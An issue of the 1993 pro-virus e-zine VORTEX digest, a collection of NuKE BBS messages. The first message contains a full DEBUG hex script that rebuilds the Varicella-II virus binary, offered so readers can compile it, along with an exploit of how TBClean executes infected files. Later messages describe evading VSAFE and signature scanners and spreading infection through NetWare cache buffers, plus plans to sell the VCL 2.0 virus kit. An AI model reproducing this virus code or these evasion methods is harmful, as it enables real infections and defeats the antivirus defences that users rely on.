

      ‹      ‹      ‹ €€€€€€‹   ‹ €€€€€€‹
     ∞∞∞∞ ﬂ∞∞∞∞ ∞∞∞∞ ∞∞∞∞       ∞∞∞∞ ∞∞∞∞ﬂ ﬂ∞∞∞∞ ∞∞∞∞ﬂ ﬂ∞∞∞∞ ∞∞∞∞∞    ∞∞∞∞
     ±±±±  ±±±± ±±±± ±±±±       ±±±± ±±±±   ±±±± ±±±±   ±±±± ±±±±±±   ±±±±
     ≤≤≤≤  ﬂﬂﬂﬂ ≤≤≤≤ ≤≤≤≤       ≤≤≤≤ ≤≤≤≤   ﬂﬂﬂﬂ ≤≤≤≤   ≤≤≤≤ ≤≤≤≤≤≤≤  ≤≤≤≤
     €€€€       €€€€ €€€€       €€€€ €€€€       €€€€   €€€€ €€€€€€€€‹€€€€
     ﬂ≤≤≤≤‹     ≤≤≤≤ ≤≤≤≤       ≤≤≤≤ ≤≤≤≤       ≤≤≤≤   ≤≤≤≤ ≤≤≤≤ﬂ≤≤≤≤≤≤≤≤
      ﬂ±±±±‹    ±±±± ±±±±       ±±±± ±±±±       ±±±±   ±±±± ±±±±  ±±±±±±±
       ﬂ∞∞∞∞‹   ∞∞∞∞ ∞∞∞∞       ∞∞∞∞ ∞∞∞∞       ∞∞∞∞   ∞∞∞∞ ∞∞∞∞   ∞∞∞∞∞∞
        ﬂ∞∞∞∞‹   HACKING        BOGUS MAIL       VIRUSES             SEX
         ﬂ∞∞∞∞‹ ∞∞∞∞ ∞∞∞∞       ∞∞∞∞ ∞∞∞∞       ∞∞∞∞   ∞∞∞∞ ∞∞∞∞    ﬂ∞∞∞∞
          ﬂ±±±± ±±±± ±±±±       ±±±± ±±±±       ±±±±   ±±±± ±±±±     ±±±±
     ‹‹‹‹  ∞∞∞∞ ∞∞∞∞ ∞∞∞∞       ∞∞∞∞ ∞∞∞∞   ‹‹‹‹ ∞∞∞∞   ∞∞∞∞ ∞∞∞∞     ∞∞∞∞
     ±±±±  ±±±± ±±±± ±±±±       ±±±± ±±±±   ±±±± ±±±±   ±±±± ±±±±     ±±±±
     ≤≤≤≤‹ ≤≤≤≤ ≤≤≤≤ ≤≤≤≤‹‹‹‹‹‹ ≤≤≤≤ ≤≤≤≤‹ ‹≤≤≤≤ ≤≤≤≤‹ ‹≤≤≤≤ ≤≤≤≤     ≤≤≤≤
     ﬂﬂ€€€€€€ﬂﬂ €€€€ €€€€€€€€€€ €€€€ ﬂﬂ€€€€€€€ﬂﬂ ﬂﬂ€€€€€€€ﬂﬂ €€€€     €€€€
‹‹‹‹‹‹‹‹‹ ‹‹‹‹‹‹‹‹‹  ‹‹‹‹‹  ‹‹‹‹‹‹‹‹‹‹ ‹‹‹‹‹‹‹‹‹‹‹‹ ‹‹‹‹‹‹‹‹‹‹‹‹‹ ‹‹‹‹‹‹ ‹‹‹‹‹‹
 ﬂ≤≤±±∞∞ ﬂ ∞∞±±≤≤ﬂ‹≤≤±∞∞∞±≤≤‹ﬂ±±∞∞∞∞±≤≤‹ﬂ≤≤±±∞∞∞∞±≤≤‹ﬂ≤≤±±∞∞∞∞±±≤≤‹ﬂ≤≤±∞ﬂ∞±≤≤ﬂ
   ﬂ≤≤±±∞∞∞±±≤≤ﬂ ≤≤±±∞∞‹∞∞±±≤≤ ±∞ ﬂﬂ∞±±≤≤    ‹‹‹‹      ≤±±∞‹‹‹‹‹     ﬂ±∞∞∞±ﬂ
     ﬂ≤≤±±∞±≤ﬂ   ≤≤±±∞∞ﬂ∞∞±±≤≤ ±∞ﬂﬂ∞±≤≤ﬂ     ≤∞±≤      ≤±±∞ﬂﬂﬂﬂﬂ     ‹±∞∞∞±‹
       ﬂ≤∞±ﬂ      ﬂ≤≤±∞∞∞±≤≤ﬂ‹≤±∞∞∞∞±≤≤‹     ≤∞±≤     ‹≤±±∞∞∞∞±±≤≤ﬂ‹≤≤±∞‹∞±≤≤‹
ﬂ   ﬂﬂ ﬂ ﬂ ﬂﬂﬂ ﬂﬂﬂﬂ  ﬂﬂﬂﬂﬂ  ﬂﬂﬂﬂﬂ€€ﬂﬂﬂﬂﬂﬂ ﬂﬂ ﬂﬂﬂﬂ ﬂﬂ ﬂﬂﬂﬂﬂﬂﬂﬂﬂﬂﬂﬂ ﬂﬂﬂﬂﬂﬂ ﬂﬂﬂﬂﬂﬂ
=============================================================================

                              VORTEX DIGEST


     VORTEX digest is a moderated, digested mail forum similar to the pro
   AV rag VIRUS-L. However, VORTEX digest is much less anal retentive
   and covers topics decidedly pro-virus. Submissions will be accepted
   and should this damn thing actually become popular it will become a
   regular feature of THE SILICON VORTEX. All submissions should offer
   something of interest and concerning the subject of Viruses.




Todays topics:

NuKE does it again
ARiSToTLE'S DNA article
DAV_SWIZ
Net Cache Hole
VCL II (when will it be released?)
More About VCL

(71)    Wed 6 Oct 93  8:35p                                 Cost: 0
By: Rock Steady
To: All
Re: NuKE does it Again
St: Local
------------------------------------------------------------------------------

Today, Cybernetic Violence receive a new update of ThunderByte AntiVirus
Package. Uptodate, the current version is 6.05. If everyone read the Info-
Journal #7, concerning Varecalla-][ virus, that showed the flaws of TBCLEAN,
(from Version 6.04), you will noticed that VARICELLA-][ is STILL effective
against Version 6.05.

Apparently, those at ThunderByte, either are unaware of the doing of the
Varicella-][ virus, or simply don't wish to put the time to `fix' it. It is
sad, either way. Because TBCLean's Emulation technique to disinfect viruses,
actually consists of EXECUTING the virus is a controlled environment with the
help of the Trap flag and Int 1h,3h. Sad! to the extreme!

Sad because, if your System in NOT and I repeat NOT infected by any viruses,
simply executing TBClean to "try" to disinfect a file infected with
Varicella-][ virus will cause the Varicella-][ virus to load, and go resident,
and start infecting everything in sight! While TBclean will report that is is
NOT infected by any virus, and will end. While Varicella-][ is alive and well
in memory!

============== A TEST for the experienced ==============
I have encluded a debug script of Varicella-][ virus, simply capture is, and do
DEBUG < filename, and you will be able to compile the binary virus for you own
testing. Varicella-][ has been tested against TBClean versions 6.03,6.04,6.05
and still successful!

Please distribute this message far and wide to all potention TBAV users, it is
something they must KNOW about their package! The TBAV package is a
_danagerous_ package, as it tried to EXECUTE infected files to disinfect them.
"Smart" viruses like Varicella-][ can escape and go resident, all to the fault
of TBCLEAN!

------------------------- Beginning of Debug Script VARICEL2.SRC -------------
N VARICEL2.COM
E 0100 EB 01 90 E8 00 00 5D 81 ED 06 01 50 53 51 52 56
E 0110 06 1E 2E C6 86 1E 03 00 33 D2 8E DA A1 06 00 48
E 0120 8E D8 40 B9 FF FF 8B F2 8B 04 35 F3 A5 74 06 46
E 0130 E2 F6 EB 45 90 8B 44 04 35 06 00 75 F2 8B 44 0A
E 0140 35 0E 02 75 EA 8B 44 0C 35 00 C7 75 E2 8B 44 0E
E 0150 35 06 04 75 DA 8B 5C 11 C6 47 10 CF 8B 5C 1B C6
E 0160 47 10 CF 2E C6 86 1E 03 01 8B 5C 51 2E 89 9E 1F
E 0170 03 8B 5C FB 2E 89 9E 1A 03 33 D2 1E 8E DA C4 36
E 0180 84 00 2E 89 B6 16 03 2E 8C 86 18 03 C4 36 70 00
E 0190 2E 89 B6 12 03 2E 8C 86 14 03 C4 36 4C 00 2E 89
E 01A0 B6 0E 03 2E 8C 86 10 03 1F 2E C6 86 09 03 00 B8
E 01B0 CD AB CD 13 81 FB CD AB 75 15 E9 E8 00 2E 8A 86
E 01C0 09 03 3C FF 74 F4 2E FE 86 09 03 3C 01 77 34 B4
E 01D0 52 CD 21 26 8B 47 FE 8E C0 26 80 3E 00 00 5A 75
E 01E0 03 F8 EB 2B 26 80 3E 00 00 4D 74 03 F9 EB 20 2E
E 01F0 80 BE 09 03 00 74 0C 8C DA 83 EA 09 26 39 16 01
E 0200 00 74 0E 8C C0 26 03 06 03 00 40 8E C0 EB CA 72
E 0210 A9 26 83 3E 03 00 7C 90 72 A3 26 C6 06 00 00 5A
E 0220 26 83 2E 03 00 7C 90 26 03 06 03 00 40 8E C0 BF
E 0230 03 01 1E 0E 1F BE 03 01 03 F5 B9 BB 06 FC F2 A4
E 0240 8E D9 FA C7 06 84 00 B0 03 8C 06 86 00 C7 06 70
E 0250 00 30 03 8C 06 72 00 C7 06 4C 00 23 03 8C 06 4E
E 0260 00 FB 2E 80 BE 1E 03 00 74 0E 80 F9 01 74 09 2E
E 0270 8E 9E 1F 03 FE C1 EB CA 1F 2E 80 BE 1E 03 01 74
E 0280 03 EB 22 90 2E 8B B6 1A 03 C7 84 94 00 B0 03 8C
E 0290 84 96 00 C7 84 80 00 30 03 8C 84 82 00 C7 44 5C
E 02A0 23 03 8C 44 5E 1F 07 5E 2E 81 BE A4 07 4D 5A 74
E 02B0 2E 2E 81 BE A4 07 5A 4D 74 25 0E 1F BB A4 07 03
E 02C0 DD 8B 07 A3 00 01 43 43 8A 07 A2 02 01 5A 59 5B
E 02D0 2E 8F 86 0A 03 B8 00 01 50 2E 8B 86 0A 03 C3 8C
E 02E0 DA 83 C2 10 2E 8F 86 0A 03 59 5B 58 2E 01 96 BA
E 02F0 07 2E 03 96 B2 07 FA 8E D2 2E 8B A6 B4 07 FB 2E
E 0300 8B 96 0A 03 2E FF AE B8 07 00 00 00 00 00 00 00
E 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0320 00 00 00 3D CD AB 74 05 2E FF 2E 0E 03 8B D8 CF
E 0330 CF E8 54 04 84 C0 75 45 50 53 51 06 B4 51 E8 47
E 0340 04 8E C3 26 3B 1E 16 00 75 2F 8B DA 8A 07 50 B4
E 0350 2F E8 34 04 58 FE C0 75 03 83 C3 07 26 8B 47 17
E 0360 26 8B 4F 19 25 1F 00 83 E1 1F 33 C1 75 0B 26 81
E 0370 6F 1D BB 06 26 83 5F 1F 00 07 59 5B 58 CF E8 07
E 0380 04 72 2A 50 53 51 06 B4 2F E8 FC 03 26 8B 47 16
E 0390 26 8B 4F 18 25 1F 00 83 E1 1F 33 C1 75 0B 26 81
E 03A0 6F 1A BB 06 26 83 5F 1C 00 07 59 5B 58 CA 02 00
E 03B0 80 FC 11 74 28 80 FC 12 74 23 80 FC 4E 74 21 80
E 03C0 FC 4F 74 1C 80 FC 3D 74 19 80 FC 6C 74 17 80 FC
E 03D0 3E 74 15 80 FC 4B 74 13 2E FF 2E 16 03 E9 51 FF
E 03E0 EB 9C E9 0F 03 E9 06 03 E9 D8 01 E8 36 03 2E 80
E 03F0 3E 86 07 01 74 0A 2E 80 3E 87 07 01 74 02 EB D8
E 0400 E8 22 02 2E 89 16 0A 03 9C 2E FF 1E 16 03 2E 87
E 0410 16 0A 03 2E C6 06 92 07 00 50 53 51 52 56 57 06
E 0420 1E B8 24 35 E8 61 03 06 53 1E 52 0E 1F BA B0 03
E 0430 B8 24 25 E8 52 03 5A 1F 2E 80 3E 92 07 00 74 07
E 0440 2E A1 9C 07 EB 28 90 B8 00 43 E8 3B 03 73 03 E9
E 0450 45 01 2E 88 0E 97 07 F6 C1 01 74 07 49 B8 01 43
E 0460 E8 25 03 B8 02 3D E8 1F 03 73 03 E9 29 01 93 0E
E 0470 1F B8 00 57 E8 11 03 2E 89 0E A0 07 2E 89 0E A2
E 0480 07 2E 89 16 9E 07 83 E1 1F 83 E2 1F 33 CA 75 03
E 0490 E9 FF 00 2E 83 26 A0 07 E0 2E 09 16 A0 07 B8 00
E 04A0 42 33 C9 33 D2 E8 E0 02 2E C7 06 BC 07 DB DB BA
E 04B0 A4 07 B9 18 00 B4 3F E8 CE 02 72 21 2B C8 75 1D
E 04C0 8B D1 B8 02 42 E8 C0 02 72 13 2E A3 9A 07 2E 89
E 04D0 16 98 07 E8 3C 02 74 08 3D 35 F9 72 03 E9 B2 00
E 04E0 BA 03 01 B9 BB 06 B4 40 E8 9D 02 72 F0 2B C8 75
E 04F0 EC 8B D1 B8 00 42 E8 8F 02 72 E2 2E A1 9A 07 E8
E 0500 10 02 75 66 2E 8B 16 98 07 B9 04 00 2E 8B 36 AC
E 0510 07 D3 E6 2B C6 83 DA 00 B9 10 00 F7 F1 2E 89 16
E 0520 B8 07 2E A3 BA 07 81 C2 BB 07 2E 89 16 B4 07 2E
E 0530 A3 B2 07 2E 83 06 AE 07 6C 90 2E A1 AE 07 2E 3B
E 0540 06 B0 07 72 04 2E A3 B0 07 2E A1 A6 07 05 BB 06
E 0550 50 80 E4 01 2E A3 A6 07 58 B1 09 D3 E8 2E 01 06
E 0560 A8 07 BA A4 07 B9 18 00 EB 13 2D 03 00 2E A3 A5
E 0570 07 2E C6 06 A4 07 E9 BA A4 07 B9 03 00 B4 40 E8
E 0580 06 02 2E 8B 16 9E 07 2E 8B 0E A0 07 B8 01 57 E8
E 0590 F6 01 B4 3E E8 F1 01 5A 1F B8 24 25 E8 E9 01 1F
E 05A0 07 5F 5E 5A 33 C9 2E 8A 0E 97 07 B8 01 43 E8 D7
E 05B0 01 59 5B 58 2E 80 3E 92 07 00 74 01 CF 2E 8B 16
E 05C0 0A 03 CF 83 FB 04 77 03 E9 0D FE 50 53 51 52 56
E 05D0 57 06 1E 53 B8 20 12 CD 2F B8 16 12 26 8A 1D CD
E 05E0 2F 5B 83 C7 11 26 C6 45 F1 02 83 C7 17 26 81 3D
E 05F0 43 4F 75 0A 26 80 7D 02 4D 74 11 EB 1D 90 26 81
E 0600 3D 45 58 75 F6 26 80 7D 02 45 75 EF 2E C6 06 92
E 0610 07 01 2E 89 1E 9C 07 E9 07 FE 1F 07 5F 5E 5A 59
E 0620 5B 58 E9 B3 FD 50 53 51 52 1E B8 00 43 E8 58 01
E 0630 F6 C1 01 74 0C 49 B8 01 43 E8 4C 01 73 03 E9 A7
E 0640 00 B8 02 3D E8 41 01 73 03 E9 9C 00 93 B8 00 57
E 0650 E8 35 01 2E 89 0E A0 07 2E 89 16 9E 07 83 E1 1F
E 0660 83 E2 1F 33 CA 75 38 B8 02 42 33 C9 33 D2 E8 17
E 0670 01 0E 1F 8B CA 8B D0 51 52 83 EA 1C 83 D9 00 B8
E 0680 00 42 E8 03 01 B4 3F B9 1C 00 BA A2 07 E8 F8 00
E 0690 E8 7F 00 74 0D 81 3E BC 07 DB DB 74 05 5A 59 EB
E 06A0 42 90 33 C9 33 D2 B8 00 42 E8 DC 00 B4 40 BA A4
E 06B0 07 B9 18 00 E8 5B 00 74 03 B9 03 00 E8 C9 00 5A
E 06C0 59 81 EA BB 06 83 D9 00 B8 00 42 E8 BA 00 B4 40
E 06D0 33 C9 E8 B3 00 8B 0E A2 07 8B 16 9E 07 B8 01 57
E 06E0 E8 A5 00 B4 3E E8 A0 00 1F 5A 59 5B 58 C3 52 8B
E 06F0 D6 EB 02 90 52 E8 2C 00 2E 80 3E 86 07 01 74 0B
E 0700 2E 80 3E 87 07 01 74 03 EB 04 90 E8 17 FF 5A E9
E 0710 C6 FC 56 2E 8B 36 A4 07 81 FE 4D 5A 74 04 81 FE
E 0720 5A 4D 5E C3 9C 51 56 8B F2 B9 80 00 2E C6 06 86
E 0730 07 00 2E C6 06 87 07 00 80 3C 2E 74 03 46 E2 F8
E 0740 46 81 3C 43 4F 75 06 80 7C 02 4D 74 27 81 3C 63
E 0750 6F 75 06 80 7C 02 6D 74 1B 81 3C 45 58 75 06 80
E 0760 7C 02 45 74 17 81 3C 65 78 75 17 80 7C 02 65 74
E 0770 0B EB 0F 90 2E C6 06 86 07 01 EB 06 2E C6 06 87
E 0780 07 01 5E 59 9D C3 00 00 9C 2E FF 1E 16 03 C3 B0
E 0790 03 CF 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 07A0 00 00 00 00 CD 20 90 90 90 90 90 90 90 90 90 90
E 07B0 90 90 90 90 90 90 90 90 90 90 90 90 DB DB
RCX
06BE
W
Q
------------------------------------ End of Debug Script file --------------

Please Distribute this to every Virus & Security Base around. So it may get
coverage and alert potention TBAV users, which are in potential dnger, as they
should KNOW that TBClean is a _very_ dangerous product, that executes virus
infected files, in order to disinfect them! "smart-stealth" virus like the
above will result in going resident and infecting files, simply by trying to
disinfect it.

This is _NOT_ intended as "Bad Press" for ThunderByte AntiVirus, the virus
Script file has been included so you may conduct your own tests. As you will
conclude, what is said about TBClean by us, is true. Beware, of TBAV. It is
potential dangerous. TBAV takes potential HIGH risks of system distruction by
tring to "diinfect" by executing the virus infected file! (Crazy). Even though
it is in a "controlled" environment, stealth viruses can still go resident!

Hopefully, the makers of TB will `fix' this problem, as the paying consumer
should get the value of his buck, not lies.  Stay turn, that NuKE will offer an
Anti-Virus package soon to come before christmass, which should put a halt to
all these "wanna-be's" AntiVirus packages, for only a fraction of the cost of
other AntiVirus packages..

Naturally, those that can stop a virus at its tracks, are those that understand
how a virus works! That's why NuKE is here for you!

          Rock Steady/NuKE


---
 * Origin: Cybernetic Voilence - NuKE WHQ - 514.426.9194 v32b (111:950/0)
SEEN-BY: 147/69 1032 950/0 1 7 8 15 19 20 21 23 24 25 31 75 101 103 110 111
SEEN-BY: 950/114 300 400 500 501 502 1030 2021
============================================================================

(72)    Wed 6 Oct 93  8:37p                                 Cost: 0
By: Newbomb Turk
To: All
Re: John's Article....
St: Local
------------------------------------------------------------------------------

                    WELCOME DnA ADDICTS to JACKEL's CORNER

    This is a NEW addition to an already eXotic issue from your favorite
bunch of Cyberlistic, to cool to be FUNKY, here's the REAL story, just
for YOU crew.
What you will see in this new FORUM, will be the voices that are heard
around the world. I will be doing my best to bring you the Real Story,
from the people who made it happen. This forum is open to those whose
interests touch on the weekness, as well as those who wish to protect
all from evil. This Forum will also be your access to the people who
make it happen. We look forward to interviews with the entire NuKE
Staff, the people at Phal/Skis, Y.A. Mcafee, ect. We also hope to draw
the interest of those in the A.V sector; Dr.Solly, ect. Rebutal is only
fair. There will be no FLAMMING, just the FACTS.

  I want to open this Forum up to questions for the above mentioned. I
will pick those that best express the views that represent, on a whole,
the views of the readers of DnA Mag. These will be included in the next
issue of DnA, with a response, if possible. I can be reached by E-Mail
at my BBS -=KGB=- (714) or on "DIGITAL DECAY (714)." If you don't have the
either of the numbers, you can reach me on NuKE Net / NuKE the WoRLd;
otherwise, download the latest copy of the CRYPTLTR (Crypt News Letter)
I believe that #17 is the latest issue, and has the # to Digital Decay.

 This Months "FEATURED WRITER"   is   "ARISTOTLE" of "NuKE"


    Welcome ARiSToTLE; What Makes You TICK ???


Name:   Ah well!
Alias:  ARiSToTLE
Age:    34
Home:   Newport News, Virginia
BBS:    BLACK AXiS VX
        (804)599.4152
        NUP: NEWLOZER

Groups: Someone said NuKE

Viruses Written: Have you ever seen a virus with my name in it?
                 I didn't think so!


(ıÖcKäL)   (Q:    Since most of the world knows about you only through the eyes
    of those who fear you most, how about letting us in on the Wonder Years
    of "Aristotle."  What was your insperation that led you to become what
    you are today ??

(ARiSToTLE)(A:

Fear me! Whatever for? I keep hearing these rumblings from a number of
tiny corners in the world and wonder how my being came to be something
equated to 'EViL'. I am a political animal. There is nothing about me
of which to be afraid. All of this AV/VX stuff came about as a result
of a simple research study I did while in my senior year at the College
of William and Mary, in Williamsburg, Virginia. ( Ok. Cheap plug!)  :)

Essentially, I began looking at the computer underground as a source
of information to aid me in writing a article entitled, 'H/P/V/A/C:
The Costs As They Apply To The World Business Community'. This article
was to either prove or disprove the general consensus of the business
community, the claims that the computer underground was costing them
millions. (It looks great on paper!) After a short period, I narrowed
the scope of my focus to include only the Virus/Anti-Virus struggle.
It turns out that the AV has more of a hand in what is going on in the
undeground than you would first imagine at first glance. Everybody
ranks on ol' McAffe. No matter if it's AV or VX, they all having some
negative commentary to belch forth. I will be the first to admit, that
in spite of what you might think, this guy is doing really well as a
business. I don't really think you'll see John in any Fido echos,
arguing with virus authors. Nor will he carry the burning cross of
righteousness, beating the VX for what they do. In fact, if you watch
how he operates, you just might learn something. In earlier days, a
few mistakes in the public came back to haunt him, but I believe he
has managed to disassociate himself from a lot of the tactics that
the present day 'Holy-Rollin' AV guys are doing. Simply run down to
a stock broker and order a prospectus on the guy. A friend of mine
upload some excerpts from it and I was quite amazed...

        "Need any help, John?"

Two semesters of research, two 'A's, and an absolute metric buttload
of computer viruses and source codes are what I have to show for my
work. So I thought, 'What now?', and the obvious smacked me between the
eyes. SELL 'EM! It's the way of the American entreprenuer. At first,
I wasn't sure there was a market for computer viruses, but let me tell
you what! I was amazed at how many people wanted these things. This
is where I started getting this 'EViL' stigma tagged to my name. The
anti-virus community, the 'AV', is made up of people that don't want
me telling the general public what is actually going on with all this
- 'The Virus That Ate New York' hype.

Basically, it is like this; there are some people with commercially
vested interests that are playing the media and legislative bodies
like a orchestra. Their goal is to obtain legislation or regulation
that will restrict your rights with respect to what you can and cannot
have. They know full well that most 'legitimate' people will stop
tinkering around and that the hardcore underground will continue even
after such things are in place. This means that information will soon
become a marketable commodity in this field and they want a dominant
position if and when it does. If people like myself can be restricted
from research, then fewer people will have access to information, thus
the basic concepts of economic supply and demand will yield a greater
profit for those who enjoy the fruits of approval.


(ıÖcKäL)   (Q: Now that 1993 is more than ´ over, what are your views on the
           general activity of GROUPS as we have come to know them ??

(ARiSToTLE)(A:

I see NuKE trying to legitimize their existance with a different
approach to things they enjoy doing. Knowing that the AV uses things
like the VCL to market their product, I have been working on getting
some folks to market their product as a 'Researcher's Toolkit' and
selling it under licensing agreements. I don't however advocate writing
the problem and subsequently selling the cure. In addition to this,
I am presently getting a FiDO echo known as 'NuKE_THEWORLD', put on
the backbone. This will serve in allowing people with questions about
viruses and the people behind the scene, the opportunity to get an
unbiased or censored answer staight from the horses mouth. It also
gives people in the underground the chance to be heard on an equal
platform. Perhaps here, something can be learned from both sides of
the fence.

(ıÖcKäL)   (Q: Was there any one thing in 1993' that generally upset you???

(ARiSToTLE)(A:

    Yes! When ARCV was arrested in England for phreaking, the police
rushed in and seized his computer, yet it was not his computer he
used in phreaking. It was his phone. They already knew that he,
(Apache Warrior), was tied into his neighbors house with a drop
line, but they needed a reason to seize his machine. Once they took
his computer, naturally they found viruses that he 'alledgedly' had
written. To date, he has yet to be charged and they are still holding
his equipment. The twist here is that Dr. Solomon is supposedly a
technical advisor on this case and he is the person who is running
amuck telling the world about the case. Apache Warrior is basically
being tried in public via FiDO and INTERNET. This is where I get a
tad bit annoyed. It was alledged by someone that *I* was a member of
this ARCV group. Dr. Solomon and other are running around every chance
they get re-telling this story in hopes that it becomes some type of
'general knowledge' and enough to get me taken to England to disclaim
the allegation. Solomon and I have spent hours on the phone in the
last 10 months, discussing this and other issues. He knows full well
that I am not and have never been a member of ARCV. What he does know
is that a 34 year old man with a wife a two kids, can't very well
take off and go to England to defend crap like this. So, in hope
of silencing my voice, he continues to chatter. THIS is what chaps
my ass and the drive for me to continue exposing software developer's
true light.

(ıÖcKäL)   (Q:     Have you any words of wisdom to leave in your wake?

Of course! :) Unless you're a big, mean mother and can really defend
yourself well... Think long and hard before you let the 'coolness'
of the computer underground put you in a jailhouse with a bunch of
guys who want to play EDNA with you. You can rest assured that some
fool in jail will be thinking 'long and hard' about you...
              (REMEMBER, YOU READ THIS HERE!!)

(ıÖcKäL)   (Q:    What is the future of NuKe.

(ARiSToTLE)(A:
                   Live day by day! - What is your future?


        ≥ƒƒƒƒ≤˛≤˛≤˛≤˛≤˛==ƒƒƒƒƒƒ, ... a shot of reality never hurt!

                                                           ARiSToTLE

    Take it from someone who KNOWS !! The SHIT gets thicker the closer
    YOU GET to the "FIRE".

    Next iSSUE; Supprise, Supprise, Supprise,,,

                Till Then,                  -=ıÖcKäL=-


... BRoKeDoWN PaLaCe BBs NUKe NeT Va
--- Impeach Clinton Now!
 * Origin: BRoKeDoWN PaLaCe NUKeNeT Va (1:13/220.0)
SEEN-BY: 13/220 132/180 147/69 1032 265/101 271/220 265 950/1 20 21 23 24 25
SEEN-BY: 950/31 101 103 110 111 114 300 400 500 501 502 1030 2021 3633/132
=============================================================================

By: Typoid Mary, The Screaming Fetus BBS (111:950/101)
To: All
Re: Re: Dav_Swiz
St: Local
------------------------------------------------------------------------------

In a msg on <Sep 19>, Aristotle of 111:950/20 confided:

 A>I believe the Dark Avenger released one called, 'DAV_SWIZ'

 A>Supposed to be a really cool virus that evades all forms of AV
 A>detection.

 A>ARiSToTLE

Ari, dav_swiz.asm defeats the VSAFE.COM program in only the special case where
VSAFE.COM is loaded TSR by the user as the last element in the TSR chain.
Loading VSAFE.COM with QEMM, or including it within a chain of other TSR
programs results in an error screen when dav_swiz.com attempts to remove the
program using the ALT-U keyboard interrupt.

A more sophisticated way to defeat VSAFE is to restore the interrupt vectors
hooked into the TSR program.  The vectors are tested to detect opening
an .EXE or .COM file extension, to find programs attempting to become TSR
resident, etc.  By removing the int 21 vector to VSAFE.COM (leaving the key-
board vector intact) the program will appear to function, yet will not
detect the operation of a virus code appending to .COM and modifying .EXE
files.

Defeating the heuristic scanning algorithm by calling small routines is more
of a statement of the futility of heuristic scanning than an accomplishment in
stealth.  Calling several small subroutines is good practice, especially if the
virus code can be broken into parts having different byte alignments and the
jumps made to facilitate switching the alignments.  Changing the alignment
makes disassembly more complicated, but by no means impossible.

Including NOP instructions to foil string scanning detection (McAfee) can work
for simple scanners.  However, any good scanning method should pre-process the
data block to remove NOPs not required for byte alignment.  Thus, the NOPs
added would be parsed out and the instruction string being searched would be
recovered.  Searching on strings of text or encrypted text would not be
defeated by including NOPs into the code portion of the virus.  Probably the
best way to defeat string scanning is to mutate the byte alignment of code
portions using a combination of NOPs and executable, but unnecessary
instructions.  A virus written in this fashion could be both difficult to
detect and hard to disassemble.

I'm hoping to take a look at the source for Nimpho soon, but my list of things
to do is growing rapidly.

--- msgedsq 2.1
 * Origin: Lost in Cipherspace (111:950/101)
============================================================================


(80)    Wed 6 Oct 93  9:35p                                 Cost: 0
By: Starlite, The Screaming Fetus BBS (111:950/110)
To: All
Re: Novell Netware Cache hole
St: Local
------------------------------------------------------------------------------

Interesting observation on Netware 3.11:

When a user reads a file from the server, the file is loaded immediately into a
cache buffer and then executed.  The cache buffer is flushed every 3.3 seconds,
or the file will reside in the buffer if alot of simultaneous access to that
specific file is required (read here: LOGIN.EXE at 9:00am at most companies).
What, pray tell, does this mean?  Well, that information, along with the fact
that the cache buffer disregards a user's Read Only status to that file,
presents an interesting method of infecting a large number of workstations on a
network.  A workstation's memory resident .EXE or .COM infector will infect the
file.  A moment later when another workstation attempts to read the file, it
reads the infected version in the buffer and infects itself.  When the buffer
is eventually flushed, the file will not be updated on the server's physical
disk because the file is marked Read Only.  Thus, scanning of the server disks
produce no viruses.

What about AV tools?  Signficantly moronic is McAffee's approach.  Their .NLM
only scans reads and writes to the physical disk.  The cache buffer could be
infected and McAffee would never know it.  Enter CP.  Their product does scan
the buffer, but only by accident.  Moral of the story: don't ignore your cache
buffers on a Novell network.

Real world model:  The Athens virus hits a 3500 node, 52 server network at
8:50pm on a Thursday night.  LOGOUT.EXE is infected when the unwitting user
logs out of the network.  A shared database application is also infected.
Friday morning, 30 users log into the network and access the database
application.  Their machines are infected, and as the users utilize other
applications on the network, those applications become infected in the cache
and jump to other workstations.  by 11:00am, computing management notices that
the file size of the originally infected shared database application is wrong.
A quick scan of the file using McAffee's scan program on the server's physical
disk finds nothing.  However a scan of a user's computer finds the Athens
virus.  Soon, calls of locked-up machines (the Athens virus freezes the
computer when running SCAN) flood information center staff.  By 2:00 computing
management realizes that the server is possibly hosting a virus and immediately
broadcasts a message to all users to log out of the network.  Users run the
infected LOGOUT.EXE and infect their workstations.  Within twenty minutes the
network is shut down for 40 hours and over 300 workstations are infected with
the Athens virus.

In a space of 3.3 seconds, an infected file can produce disasterous
consequences over a network.  Look out enterprise-wide computing and Windows
NT.

Starlite

---
 * Origin: Cybernetic Voilence - NuKE WHQ - 514.426.9194 v32b (111:950/0)

==========================================================================
(79)    Wed 6 Oct 93  9:32p                                 Cost: 0
By: Rock Steady, (111:950/0)
To: Windsurfer
Re: Re: Just Wondering
St: Local
------------------------------------------------------------------------------
* Original Area: Nuke
* Original To  : Windsurfer (111:950/110)

*** Quoting Windsurfer to Screaming Radish ***

Wi> negative premise and that Ass-kissing accomplishes little. But
Wi> you may
Wi> wish to enlist the assistance of a member of the media. Get
Wi> him/her to
Wi> influence their associates/patrons in a Pro-Nuke effort.
Wi>
Wi> To buy a Media person is not as formidable a task as one might
Wi> beleive.
Wi> Remember their is No honor among theives anymore. (Take that
Wi> analogy as
Wi> you may)
Wi>

Already being done, I've got a personal friend now in california, writer for a
electronic monthly mag (paper), he's will to scratch my back!

Then again, "headlines" is what ANY media person wants, headlines=$$$!

So lets get VCL 2.0 out, WHATEVER the media report on it, will benefit us! GOOD
or BAD, people will hear about VCL and try to get it, resulting to income for
us! with this income we at nuke can set up a "legal fund", whereby we will
reserves any income, for legal fees! huh? Well, some `wrong-doing' is GONNA
happen with VCL 2.0, how?

Okay, we can't copyright the viruses, because copyright means what it says,
"the right to make copies is own to ...", but viruses SELF-REPLICATE, so that's
down the tube! But the VCL 2.0 package can be copyrighted! And it will!
"NuKE Software Publishers Inc." (Inc=Incorporated) I paid hundreds to get this
done, for the purpose that Inc., can work as a BODY. So we can copyright VCL
2.0 to the company name NuKE Software Publisher Inc..."

Now, VCL v2.0 will be ramped like crazy, its gonna be marked, and the "full-
blown" copy will be _only_ by buying it! the cost will be close to nothing, the
cost will be very low, to pay of packaging,shipping, and related costs for the
marketing of VCL. Commerical Companies will have a NICE price tag, almost 20x
more than the personal one.

Now, if the NEXT upcoming version of McAfee, comes out detect ALL POSSIBLE
combinations of VCL 2.0, and I DIDN'T SELL THEM A COPY!
BBBBBIIIIIIIIGGGGGGGG   TTTTTIIIIIIIMMMMMMEEEEE!!!
Lawyers, and lawsuits being filled!! It is _understandable_ to recieve one or
two new VCL v2.0 virus per month, and every new version of scan may detect 5 or
so vcl varients!

But if the package gets ALL possible combinations, in ONE version, big time!
